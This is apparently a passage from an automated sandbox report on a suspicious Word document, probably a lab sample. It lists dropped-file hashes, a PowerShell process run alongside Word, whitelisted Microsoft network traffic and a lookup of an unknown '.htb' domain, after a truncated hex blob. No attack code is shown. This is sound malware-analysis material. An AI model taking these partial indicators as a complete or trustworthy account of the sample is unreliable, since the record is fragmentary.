42C502D522D313134303939382D37352D372C502D522D313134303939372D37352D372C502D522D313134303939362D37352D372C502D522D313134303939352D37352D372C502D522D313134303939342D37352D372C502D522D313134303939332D37352D372C502D522D313134303939322D37352D372C502D522D313134303939312D37352D372C502D522D313134303939302D37352D372C502D522D313134303938392D37352D372C502D522D313133323832312D322D342C502D522D313131393031332D312D332C502D522D313130363736382D38362D382C502D522D313130363736372D38362D382C502D522D313130363736362D38362D382C502D522D313130363736352D38362D382C502D522D313130363736342D38362D382C502D522D313130363736332D38362D382C502D522D313130363736322D38362D382C502D522D313130333237372D312D332C502D522D313039383739362D312D332C502D522D313039343434352D312D332C502D522D313035383634332D352D392C502D522D313038303431322D312D332C502D522D313038303130312D39362D392C502D522D313038303130302D39362D392C502D522D313038303039392D39362D392C502D522D313038303039372D39362D392C502D522D313038303039362D39362D392C502D522D313038303039352D39362D392C502D522D313038303039342D39362D392C502D522D313038303039332D39362D392C502D522D313038303039322D39362D392C502D522D313038303039312D39362D392C502D522D313038303039302D39362D392C502D522D313038303038392D39362D392C502D522D313038303038382D3131332D31302C502D522D313037333239312D342D362C502D522D313037313736312D312D332C502D522D313036393736392D322D342C502D522D313036393230332D312D332C502D522D313036383131352D312D332C502D522D313032343037362D342D382C502D522D313032343037342D342D382C502D522D313035393332392D3130342D31302C502D522D313035393332382D3132312D31312C502D522D313035393332362D3130342D31302C502D522D313035393332352D3130342D31302C502D522D313035393332342D3130342D31302C502D522D313035393332332D3132312D31312C502D522D313035393332322D3132312D31312C502D522D313035393332312D38372D392C502D522D313035393332302D3130342D31302C502D522D313035393331392D3130342D31302C502D522D313035393331382D3130342D31302C502D522D313035393331372D3130342D31302C502D522D313035393331362D3130342D31302C502D522D313035393331352D3130342D31302C502D522D313035393331342D3130342D31302C502D522D313035393331322D3130342D31302C502D522D313035393331312D3130342D31302C502D522D313035393331302D3130342D31302C502D522D313035393330392D3130342D31302C502D522D313035393330382D3130342D31302C502D522D313035393330372D3130342D31302C502D522D313035393330362D3130342D31302C502D522D313035393330352D3130342D31302C502D522D313035393330342D3130342D31302C502D522D313035393330332D3132312D31312C502D522D313035393330322D3130342D31302C502D522D313035393330312D3132312D31312C502D522D313035393330302D3130342D31302C502D522D313035393239392D3132312D31312C502D522D313035393239382D3130342D31302C502D522D313035393239372D3132312D31312C502D522D313035393239362D3130342D31302C502D522D313035393239352D3130342D31302C502D522D313035393239342D3130342D31302C502D522D313035393239332D3130342D31302C502D522D313035393239322D37312D382C502D522D313035393239312D3132312D31312C502D522D313035393239302D3130342D31302C502D522D313035393238392D3130342D31302C502D522D313035393238382D3130342D31302C502D522D313035393238372D3130342D31302C502D522D313035393238362D3130342D31302C502D522D313035393238352D3130342D31302C502D522D313035393238342D3130342D31302C502D522D313035393238332D3130342D31302C502D522D313035393238322D3130342D31302C502D522D313035393238312D3130342D31302C502D522D313035393238302D3130342D31302C502D522D313035393237392D3130342D31302C502D522D313035393237382D3130342D31302C502D522D313035393237372D3130342D31302C502D522D313035393237362D3130342D31302C502D522D313035393237352D3130342D31302C502D522D313035393237342D3130342D31302C502D522D313035393237332D3130342D31302C502D522D313035393237322D3130342D31302C502D522D313035393237312D3130342D31302C502D522D313035393237302D3130342D31302C502D522D313035393236392D3130342D31302C502D522D313035393236382D3130342D31302C502D522D313035393236372D3130342D31302C502D522D313035393236362D3130342D31302C502D522D313035393236352D3130342D31302C502D522D313035393236342D3130342D31302C502D522D313035393236332D3130342D31302C502D522D313035393236322D3130342D31302C502D522D313035393236312D3130342D31302C502D522D313035393236302D3130342D31302C502D522D313035393235392D3130342D31302C502D522D313035393235382D3130342D31302C502D522D313035393235372D3130342D31302C502D522D313035393235362D3130342D31302C502D522D313035393235352D3130342D31302C502D522D313035393235342D3130342D31302C502D522D313035393235332D3130342D31302C502D522D313035393235322D3130342D31302C502D522D313035393235312D3130342D31302C502D522D313035393235302D3130342D31302C502D522D313035393234392D3130342D31302C502D522D313035393234382D3130342D31302C502D522D313035393234372D3130342D31302C502D522D313035393234352D3130342D31302C502D522D313035393234342D3132312D31312C502D522D313035393234332D3130342D31302C502D522D313035393234322D3130342D31302C502D522D313035393234312D3130342D31302C502D522D313035393134362D3132302D31322C502D522D313035393035332D3131322D31312C502D522D313035383938382D3132302D31322C502D522D313035383938372D3131322D31312C502D522D313035383938362D3131322D31312C502D522D313035383938352D3132382D31332C502D522D313035383938342D3132382D31332C502D522D313035383938332D3133362D31342C502D522D313035383938322D3133372D31332C502D522D313035383938312D3131322D31312C502D522D313035383938302D3131322D31312C502D522D313035383937392D3132382D31332C502D522D313035383937382D3132382D31332C502D522D313035383937372D3134342D31352C502D522D313035383937362D3133372D31332C502D522D313035383937352D3133372D31332C502D522D313035383937342D3133372D31332C502D522D313035383937332D3133372D31332C502D522D313035383937322D3133372D31332C502D522D313035383937312D3133372D31332C502D522D313035383936392D3133372D31332C502D522D313035383936382D3133372D31332C502D522D313035383936372D3133362D31342C502D522D313035383936362D3133362D31342C502D522D313035383936352D3131322D31312C502D522D313035383936342D3131322D31312C502D522D313035383936332D3131322D31312C502D522D313035383936322D3131322D31312C502D522D313035383936312D3131322D31312C502D522D313035383936302D3131322D31312C502D522D313035383935392D3131322D31312C502D522D313035383935382D3132302D31322C502D522D313035383935372D3131322D31312C502D522D313035383935362D3132392D31322C502D522D313035383935352D3132392D31322C502D522D313035383935342D3132392D31322C502D522D313035383935332D3132392D31322C502D522D313035383935322D3132392D31322C502D522D313035383935312D3132392D31322C502D522D313035383935302D3132392D31322C502D522D313035383934392D3132392D31322C502D522D313035383934382D3132392D31322C502D522D313035383934372D3132392D31322C502D522D313035383934362D3132392D31322C502D522D313035383934352D3132392D31322C502D522D313035383934342D3132302D31322C502D522D313035383934332D3132302D31322C502D522D313035383934322D3133362D31342C502D522D313035383934312D3132302D31322C502D522D313035383934302D3132302D31322C502D522D313035383933392D3132302D31322C502D522D313035383933382D3132302D31322C502D522D313035383933372D3132302D31322C502D522D313035383933362D3132302D31322C502D522D313035383933352D3132302D31322C502D522D313034393137352D312D332C502D522D313034353131382D322D342C502D522D313034343430382D312D332C502D522D313033373838372D312D332C502D522D313033373837392D312D332C502D522D313033363239332D312D332C502D522D313033363239322D312D332C502D522D313033363238392D322D342C502D522D313033363238382D312D332C502D522D313033363036382D322D342C502D522D313033363033392D322D342C502D522D313033353933332D322D342C502D522D313033353134392D322D342C502D522D313033333831372D312D332C502D522D313033333632342D322D342C502D522D313032383535302D322D342C502D522D313032383136382D312D332C502D522D313032373533352D332D352C502D522D313032343638302D342D362C502D522D313032343037312D322D342C502D522D313031303339332D312D332C502D522D313030363839362D312D332C502D522D313030363839342D312D332C502D522D313030363536322D322D342C502D522D313030303036312D322D342C502D522D3131353934362D332D352C502D522D3131313638322D312D332C502D522D3130353733312D33362D33382C502D522D3130343433352D31332D31352C502D522D3130303239342D312D332C502D522D39393633332D312D332C502D522D39383932392D322D342C502D522D39383932362D312D332C502D522D39383235302D312D332C502D522D39343535362D322D342C502D522D39333037372D312D332C502D522D39303839352D332D352C502D522D38383330392D322D342C502D522D38363131382D312D332C502D522D38333430382D322D342C502D522D38303531372D372D392C502D522D37383835322D332D352C502D522D37383332352D332D352C502D522D37383131322D342D362C502D522D37363931382D322D342C502D522D37363732312D312D332C502D522D37363235332D312D332C502D522D37353434302D322D342C502D522D37353433362D312D332C502D522D37353433342D312D332C502D522D37353433332D312D332C502D522D37343532382D342D362C502D522D37323434392D372D31302C502D522D36383036392D322D342C502D522D36363937352D312D332C502D522D36353536372D312D332C502D522D36303630322D332D352C502D522D35383437312D322D342C502D522D35383039332D312D332C502D522D35333330392D312D332C502D522D35323633332D312D332C502D522D35323137312D322D342C502D522D35313932312D382D31302C502D522D35313235382D382D31302C502D522D35303735322D322D342C502D522D35303638312D322D342C502D522D35303539392D342D362C502D522D35303539362D342D382C502D522D35303538352D31382D32302C502D522D35303535332D312D332C502D522D34393539372D332D352C502D522D34393435382D322D342C502D522D34383533302D372D392C502D522D34373934382D312D342C502D522D34363538302D332D352C502D522D34363438342D31302D31322C502D522D34363132322D312D332C502D522D34353835382D322D342C502D522D34343935302D312D332C502D522D34333936362D322D342C502D522D34333530322D31392D32312C502D522D34333233382D332D352C502D522D34333138382D362D382C502D522D34313433302D312D332C502D522D34303735312D382D31302C502D522D34303237332D342D362C502D522D33393233382D352D372C502D522D33383837382D322D342C502D522D33383638322D332D352C502D522D33373538382D322D342C502D522D33343335352D382D31302C502D522D32363236362D342D392C502D522D32363833342D332D382C502D522D32343636322D31362D32322C502D522D32373437392D362D31312C502D522D32363035362D372D31352C502D522D32373030362D372D31322C502D522D33323139312D392D31312C502D522D33303333382D332D372C502D522D33303137382D37392D38312C502D522D33303035332D382D31302C502D522D32373435382D312D352C502D522D32353832322D31362D31392C502D522D32353038332D362D392C502D522D32343639302D34352D34392C502D522D32343638392D322D352C502D522D32343636362D322D352C502D522D32343636332D362D31312C502D522D32343635392D372D31302C502D522D32333736322D352D382C502D522D32333734342D372D392C502D522D32333733392D372D392C502D522D32333733362D31342D31372C502D522D32333733342D372D392C502D522D32333733302D32312D32342C502D522D32333732332D31302D31322C502D442D33323538392D312D332C502D442D33323538382D312D332C502D442D33323533342D312D332C502D442D33323532342D312D332C502D442D33323531382D312D332C502D442D33323531322D312D332C502D442D33323530392D312D332C502D442D33323530342D312D332C502D442D33323438352D312D342C502D442D33323438342D312D342C502D442D33323430352D312D332C502D582D313032353438352D312D352C502D582D313031343937322D322D372C502D582D313033373435392D322D352C502D582D313033363938372D322D332C502D582D313033363137332D322D332C502D582D313033333537332D312D352C502D582D313033313539322D312D332C502D582D313033303033352D322D332C502D582D313032383334312D332D31362C502D582D313031373032392D322D352C502D582D313032353231332D312D332C502D582D3131373832392D332D31332C502D582D313032303536382D312D332C502D582D313032303338302D312D352C502D582D313031353238332D322D372C502D582D313030343337332D312D352C502D582D39333430372D312D352C502D582D313031323937392D322D352C502D582D313030333137372D322D352C502D582D38373438342D372D31372C502D582D3131313733302D312D352C502D582D3130383438312D312D352C502D582D3130393235302D322D332C502D582D37373839302D312D352C502D582D37393633352D312D372C502D582D37393333352D352D32372C502D582D37333137312D312D352C502D582D37333137392D312D372C502D582D37313939392D332D31312C502D582D37313831392D312D332C502D522D313038373134312D342D372C502D522D313037353139392D362D342C502D522D313031333933302D342D352C502D522D36303537312D31382D33302C502D522D35333038352D31382D31332C502D522D35313331382D31382D382C502D522D34373034362D32362D32342C502D522D34373630312D31382D31332C502D522D34363930302D31382D382C502D522D34353831372D32302D31362C502D522D34303135322D31382D31362C502D522D33333931362D312D352C502D522D33333538302D382D392C502D522D33323034322D322D31342C502D522D33
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
Operation:writeName:ChunkCount
Value:
uint64_t|2
Executable files
0
Suspicious files
109
Text files
50
Unknown types
11

Dropped files

PID
Process
Filename
Type
4948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3GZENTDSGA9VDW2KXGPN.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
1580powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:38F9762FB52867F9F73678051790284B
SHA256:143BA550FC5E46870ADD91FBB42353A16319A56E52C9CC8F90E9C15126D5C09D
4948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:26BF8BA70648C573110DBE72C776EDFE
SHA256:9849154A987C0650398EC96F29EB70818C2059DF27A60C5FD7C62AEA8C78BD6B
1580powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bjirla4s.y5k.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1580powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dzohnpaj.am3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:D55746FC57662B0BA02EB80E1C78A192
SHA256:A805EA2EAA8010046F60D1EDDC416EBBB1C41348F595687A9526DD2E524BDEC0
4948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbresbinary
MD5:E052F1C085A72BE31A002C60B2C30E74
SHA256:F965D16C6D33B967C1A6F480F7BBCDC344C6BFC6FBF9A491C30C1C6004103DE6
4948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:AE8A347985F477DE92F26D315BD57704
SHA256:0238044D1AFF3A2EB7DF753A610AE060E5ED3DF6BDF67A777A60B759149365F2
4948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF18f548.TMPbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
4948WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04der
MD5:230B778BE6C705EAB489D5ABB256CE7C
SHA256:EBBF4197C16CECFBA655FF4D016F3E367DCF585F41726C233760A7924E6E04E0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
60
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3396
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4948
WINWORD.EXE
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
4948
WINWORD.EXE
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
1268
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1976
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4948
WINWORD.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
4948
WINWORD.EXE
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4948
WINWORD.EXE
23.48.23.42:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
4948
WINWORD.EXE
52.111.231.8:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4948
WINWORD.EXE
4.251.34.76:443
nleditor.osi.office.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.46
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
omex.cdn.office.net
  • 23.48.23.42
  • 23.48.23.11
whitelisted
messaging.lifecycle.office.com
  • 52.111.231.8
whitelisted
nleditor.osi.office.net
  • 4.251.34.76
whitelisted
login.live.com
  • 20.190.160.5
  • 40.126.32.72
  • 40.126.32.74
  • 20.190.160.14
  • 40.126.32.134
  • 40.126.32.138
  • 20.190.160.130
  • 40.126.32.68
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
da-industrial.htb
unknown

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.